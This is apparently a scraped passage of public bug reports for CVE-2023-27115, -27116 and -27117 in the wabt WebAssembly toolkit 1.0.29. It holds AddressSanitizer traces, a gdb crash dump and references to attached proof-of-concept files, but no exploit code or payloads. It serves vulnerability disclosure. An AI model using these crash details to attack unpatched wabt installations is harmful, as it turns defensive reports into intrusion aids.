        #2 0x5f54b0 in std::enable_if<__and_<std::__not_<std::__is_tuple_like<wabt::Node>>, std::is_move_constructible<wabt::Node>, std::is_move_assignable<wabt::Node>>::value, void>::type std::swap<wabt::Node>(wabt::Node&, wabt::Node&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/move.h:197:19
        #3 0x5f501e in void std::iter_swap<__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_algobase.h:182:7
        #4 0x5f46ed in __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>> std::_V2::__rotate<__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, std::random_access_iterator_tag) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_algo.h:1394:5
        #5 0x5dd60f in __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>> std::_V2::rotate<__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_algo.h:1439:14
        #6 0x5dd066 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool)::'lambda'(unsigned long)::operator()(unsigned long) const /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:279:11
        #7 0x5c8556 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:307:13
        #8 0x5ee577 in void wabt::AST::Block<(wabt::ExprType)8>(wabt::BlockExprBase<(wabt::ExprType)8> const&, wabt::LabelType) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:159:5
        #9 0x5dc2fd in wabt::AST::Construct(wabt::Expr const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:212:9
        #10 0x5c7b64 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:248:7
        #11 0x5c281f in wabt::Decompiler::Decompile[abi:cxx11]() /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:795:13
        #12 0x5be6bd in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:854:21
        #13 0x4f16bd in ProgramMain(int, char**) /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:103:18
        #14 0x4f2101 in main /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:116:10
        #15 0x7f9cae44d082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #16 0x43f04d in _start (/wabt/out/clang/Debug/asan/wasm-decompile+0x43f04d)
    
    0x610000000010 is located 48 bytes to the left of 192-byte region [0x610000000040,0x610000000100)
    allocated by thread T0 here:
        #0 0x4edc5d in operator new(unsigned long) /home/build-user/llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:95:3
        #1 0x5f05c8 in __gnu_cxx::new_allocator<wabt::Node>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/ext/new_allocator.h:115:27
        #2 0x5f0570 in std::allocator_traits<std::allocator<wabt::Node>>::allocate(std::allocator<wabt::Node>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/alloc_traits.h:460:20
        #3 0x5effaf in std::_Vector_base<wabt::Node, std::allocator<wabt::Node>>::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:346:20
        #4 0x5f3462 in void std::vector<wabt::Node, std::allocator<wabt::Node>>::_M_realloc_insert<wabt::Node>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, wabt::Node&&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/vector.tcc:440:33
        #5 0x5f3124 in wabt::Node& std::vector<wabt::Node, std::allocator<wabt::Node>>::emplace_back<wabt::Node>(wabt::Node&&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/vector.tcc:121:4
        #6 0x5dcbdc in std::vector<wabt::Node, std::allocator<wabt::Node>>::push_back(wabt::Node&&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:1204:9
        #7 0x5de429 in wabt::AST::InsertNode(wabt::NodeType, wabt::ExprType, wabt::Expr const*, unsigned int) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:104:15
        #8 0x5dc5d0 in wabt::AST::Construct(wabt::Expr const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:230:9
        #9 0x5c7b64 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:248:7
        #10 0x5ee577 in void wabt::AST::Block<(wabt::ExprType)8>(wabt::BlockExprBase<(wabt::ExprType)8> const&, wabt::LabelType) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:159:5
        #11 0x5dc2fd in wabt::AST::Construct(wabt::Expr const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:212:9
        #12 0x5c7b64 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:248:7
        #13 0x5c281f in wabt::Decompiler::Decompile[abi:cxx11]() /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:795:13
        #14 0x5be6bd in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:854:21
        #15 0x4f16bd in ProgramMain(int, char**) /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:103:18
        #16 0x4f2101 in main /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:116:10
        #17 0x7f9cae44d082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:67:17 in wabt::Node::operator=(wabt::Node&&)
    Shadow bytes around the buggy address:
      0x0c207fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c207fff8000: fa fa[fa]fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c207fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==1704949==ABORTING

CVE-2023-27117: heap overflow in wabt::Node::operator=(wabt::Node&&) · Issue #1989 · WebAssembly/wabt

WebAssembly v1.0.29 discovered to contain an abort in CWriter::MangleType.

**Title**

Aborted in CWriter::MangleType at wasm2c

**Environment**

    OS      : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    Commit  : 3054d61f703d609995798f872fc86b462617c294
    Version : 1.0.29
    Build   : make clang-debug-asan
    

**Proof of concept**

poc.wasm2c-2.wasm  
poc\_wasm2c-2.wasm.zip

**Stack dump**

    gdb /wabt/out/clang/Debug/asan/wasm2c
    pwndbg> r  --enable-multi-memory ./poc.wasm2c-2.wasm
    context:
     LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ─────────────────────────────────[ REGISTERS ]──────────────────────────────────
     RAX  0x0
    *RBX  0x7ffff7a357c0 ◂— 0x7ffff7a357c0
    *RCX  0x7ffff7a7b00b (raise+203) —▸ 0x10824848b48 ◂— 0x0
     RDX  0x0
    *RDI  0x2
    *RSI  0x7fffffff9a90 ◂— 0x0
     R8   0x0
    *R9   0x7fffffff9a90 ◂— 0x0
    *R10  0x8
    *R11  0x246
    *R12  0x43e420 (_start) ◂— endbr64
    *R13  0x7fffffffe070 ◂— 0x3
     R14  0x0
     R15  0x0
    *RBP  0x7fffffff9df0 —▸ 0x7fffffffa270 —▸ 0x7fffffffa3c0 —▸ 0x7fffffffa690 —▸ 0x7fffffffc3c0 ◂— ...
    *RSP  0x7fffffff9a90 ◂— 0x0
    *RIP  0x7ffff7a7b00b (raise+203) —▸ 0x10824848b48 ◂— 0x0
    ───────────────────────────────────[ DISASM ]───────────────────────────────────
     ► 0x7ffff7a7b00b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7a7b013 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff7a7b01c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff7a7b044 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff7a7b049                nop    dword ptr [rax]
       0x7ffff7a7b050 <killpg>       endbr64
       0x7ffff7a7b054 <killpg+4>     test   edi, edi
       0x7ffff7a7b056 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff7a7b058 <killpg+8>     neg    edi
       0x7ffff7a7b05a <killpg+10>    jmp    kill                <kill>
    
       0x7ffff7a7b05f <killpg+15>    nop
    ───────────────────────────────────[ STACK ]────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff9a90 ◂— 0x0
    01:0008│            0x7fffffff9a98 ◂— 0xfffffffffffffffb
    02:0010│            0x7fffffff9aa0 —▸ 0x757525 ◂— cli
    03:0018│            0x7fffffff9aa8 ◂— 0x0
    ... ↓               4 skipped
    ─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
     ► f 0   0x7ffff7a7b00b raise+203
       f 1   0x7ffff7a5a859 abort+299
       f 2         0x5074f0
       f 3         0x52cebf
       f 4         0x545a44
       f 5         0x535a2f
       f 6         0x528543
       f 7         0x51dd51
    ────────────────────────────────────────────────────────────────────────────────
    backtrace_msg:
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7a5a859 in __GI_abort () at abort.c:79
    #2  0x00000000005074f0 in wabt::(anonymous namespace)::CWriter::MangleType (type=...) at ../../../../src/c-writer.cc:427
    #3  0x000000000052cebf in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, sv=...) at ../../../../src/c-writer.cc:701
    #4  0x0000000000545a44 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::StackVar, char const (&) [4], char const*, char const (&) [2], wabt::(anonymous namespace)::Name<2>, char const (&) [9], wabt::(anonymous namespace)::StackVar> (this=0x7fffffffce30, t=..., u=..., args=..., args=..., args=..., args=..., args=...) at ../../../../src/c-writer.cc:204
    #5  0x0000000000535a2f in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, expr=warning: RTTI symbol not found for class 'wabt::LoadStoreExpr<(wabt::ExprType)47>'
    ...) at ../../../../src/c-writer.cc:2752
    #6  0x0000000000528543 in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, exprs=...) at ../../../../src/c-writer.cc:2043
    #7  0x000000000051dd51 in wabt::(anonymous namespace)::CWriter::Write<wabt::intrusive_list<wabt::Expr> const&, wabt::(anonymous namespace)::LabelDecl> (this=0x7fffffffce30, t=..., u=...) at ../../../../src/c-writer.cc:204
    #8  0x000000000051bd15 in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, func=...) at ../../../../src/c-writer.cc:1423
    #9  0x000000000051b647 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::Newline, wabt::Func const&, wabt::(anonymous namespace)::Newline> (this=0x7fffffffce30, t=..., u=..., args=...) at ../../../../src/c-writer.cc:205
    #10 0x000000000051182d in wabt::(anonymous namespace)::CWriter::WriteFuncs (this=0x7fffffffce30) at ../../../../src/c-writer.cc:1393
    #11 0x0000000000500bf4 in wabt::(anonymous namespace)::CWriter::WriteCSource (this=0x7fffffffce30) at ../../../../src/c-writer.cc:2794
    #12 0x00000000004ffcd7 in wabt::(anonymous namespace)::CWriter::WriteModule (this=0x7fffffffce30, module=...) at ../../../../src/c-writer.cc:2807
    #13 0x00000000004ff48d in wabt::WriteC (c_stream=0x7fffffffdaa0, h_stream=0x7fffffffdaa0, header_name=0x7ccce0 <str> "wasm.h", module=0x7fffffffd2b0, options=...) at ../../../../src/c-writer.cc:2819
    #14 0x00000000004f11b4 in ProgramMain (argc=3, argv=0x7fffffffe078) at ../../../../src/tools/wasm2c.cc:179
    #15 0x00000000004f37f2 in main (argc=3, argv=0x7fffffffe078) at ../../../../src/tools/wasm2c.cc:190
    #16 0x00007ffff7a5c083 in __libc_start_main (main=0x4f37d0 <main(int, char**)>, argc=3, argv=0x7fffffffe078, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe068) at ../csu/libc-start.c:308
    #17 0x000000000043e44e in _start ()

CVE-2023-27116: Aborted in CWriter::MangleType at wasm2c · Issue #1984 · WebAssembly/wabt

WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component wabt::cat_compute_size.

**Environment**

    OS      : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    Commit  : 3054d61f703d609995798f872fc86b462617c294
    Version : 1.0.29
    Build   : make clang-debug-asan
    

**Proof of concept**

poc-5.wasm.zip

**Stack dump**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1681910==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f858ec47234 bp 0x7ffce2314ff0 sp 0x7ffce2314ef8 T0)
    ==1681910==The signal is caused by a READ memory access.
    ==1681910==Hint: address points to the zero page.
        #0 0x7f858ec47234 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>::operator std::basic_string_view<char, std::char_traits<char>>() const (/lib/x86_64-linux-gnu/libstdc++.so.6+0x186234)
        #1 0x61d4eb in unsigned long wabt::cat_compute_size<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:27
        #2 0x61d39d in unsigned long wabt::cat_compute_size<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:39
        #3 0x61d235 in unsigned long wabt::cat_compute_size<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:39
        #4 0x61d005 in unsigned long wabt::cat_compute_size<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:39
        #5 0x60f57f in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> wabt::cat<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:75:13
        #6 0x5d137d in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:530:20
        #7 0x5ccb59 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:357:22
        #8 0x5c30b4 in wabt::Decompiler::Decompile[abi:cxx11]() /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:825:20
        #9 0x5be6bd in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:854:21
        #10 0x4f16bd in ProgramMain(int, char**) /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:103:18
        #11 0x4f2101 in main /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:116:10
        #12 0x7f858e754082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #13 0x43f04d in _start (/wabt/out/clang/Debug/asan/wasm-decompile+0x43f04d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libstdc++.so.6+0x186234) in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>::operator std::basic_string_view<char, std::char_traits<char>>() const
    ==1681910==ABORTING

CVE-2023-27115: SEGV in wabt::cat_compute_size · Issue #1992 · WebAssembly/wabt

WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component wabt::Decompiler::WrapChild.

    OS      : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    Commit  : 3054d61f703d609995798f872fc86b462617c294
    Version : 1.0.29
    Build   : make clang-debug-asan
    

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1814123==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffffe8 (pc 0x7f12f2723bfe bp 0x7ffe034681e0 sp 0x7ffe03467e18 T0)
    ==1814123==The signal is caused by a READ memory access.
        #0 0x7f12f2723bfe in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>::append(char const*, unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x144bfe)
        #1 0x609269 in wabt::Decompiler::WrapChild(wabt::Decompiler::Value&, std::basic_string_view<char, std::char_traits<char>>, std::basic_string_view<char, std::char_traits<char>>, wabt::Decompiler::Precedence) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:125:18
        #2 0x619663 in wabt::Decompiler::BracketIfNeeded(wabt::Decompiler::Value&, wabt::Decompiler::Precedence) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:143:11
        #3 0x60ce08 in wabt::Decompiler::WrapBinary(std::vector<wabt::Decompiler::Value, std::allocator<wabt::Decompiler::Value>>&, std::basic_string_view<char, std::char_traits<char>>, bool, wabt::Decompiler::Precedence) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:153:5
        #4 0x5cfb8b in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:473:16
        #5 0x5ccb59 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:357:22
        #6 0x5ccb59 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:357:22
        #7 0x5ccb59 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:357:22
        #8 0x5ccb59 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:357:22
        #9 0x5ccb59 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:357:22
        #10 0x5c30b4 in wabt::Decompiler::Decompile[abi:cxx11]() /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:825:20
        #11 0x5be6bd in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:854:21
        #12 0x4f16bd in ProgramMain(int, char**) /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:103:18
        #13 0x4f2101 in main /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:116:10
        #14 0x7f12f2272082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #15 0x43f04d in _start (/wabt/out/clang/Debug/asan/wasm-decompile+0x43f04d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libstdc++.so.6+0x144bfe) in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>::append(char const*, unsigned long)
    ==1814123==ABORTING

Tag

#linux